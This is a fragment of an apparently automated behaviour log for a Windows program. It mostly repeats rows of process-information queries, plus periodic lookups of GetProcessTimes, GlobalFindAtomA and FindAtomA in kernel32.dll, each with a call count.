| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessTimes, address_out = 0x765c3dc0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFindAtomA, address_out = 0x765bd0c0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindAtomA, address_out = 0x765bef10 |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessTimes, address_out = 0x765c3dc0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFindAtomA, address_out = 0x765bd0c0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindAtomA, address_out = 0x765bef10 |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessTimes, address_out = 0x765c3dc0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFindAtomA, address_out = 0x765bd0c0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindAtomA, address_out = 0x765bef10 |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessTimes, address_out = 0x765c3dc0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFindAtomA, address_out = 0x765bd0c0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindAtomA, address_out = 0x765bef10 |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessTimes, address_out = 0x765c3dc0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFindAtomA, address_out = 0x765bd0c0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindAtomA, address_out = 0x765bef10 |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessTimes, address_out = 0x765c3dc0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFindAtomA, address_out = 0x765bd0c0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindAtomA, address_out = 0x765bef10 |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
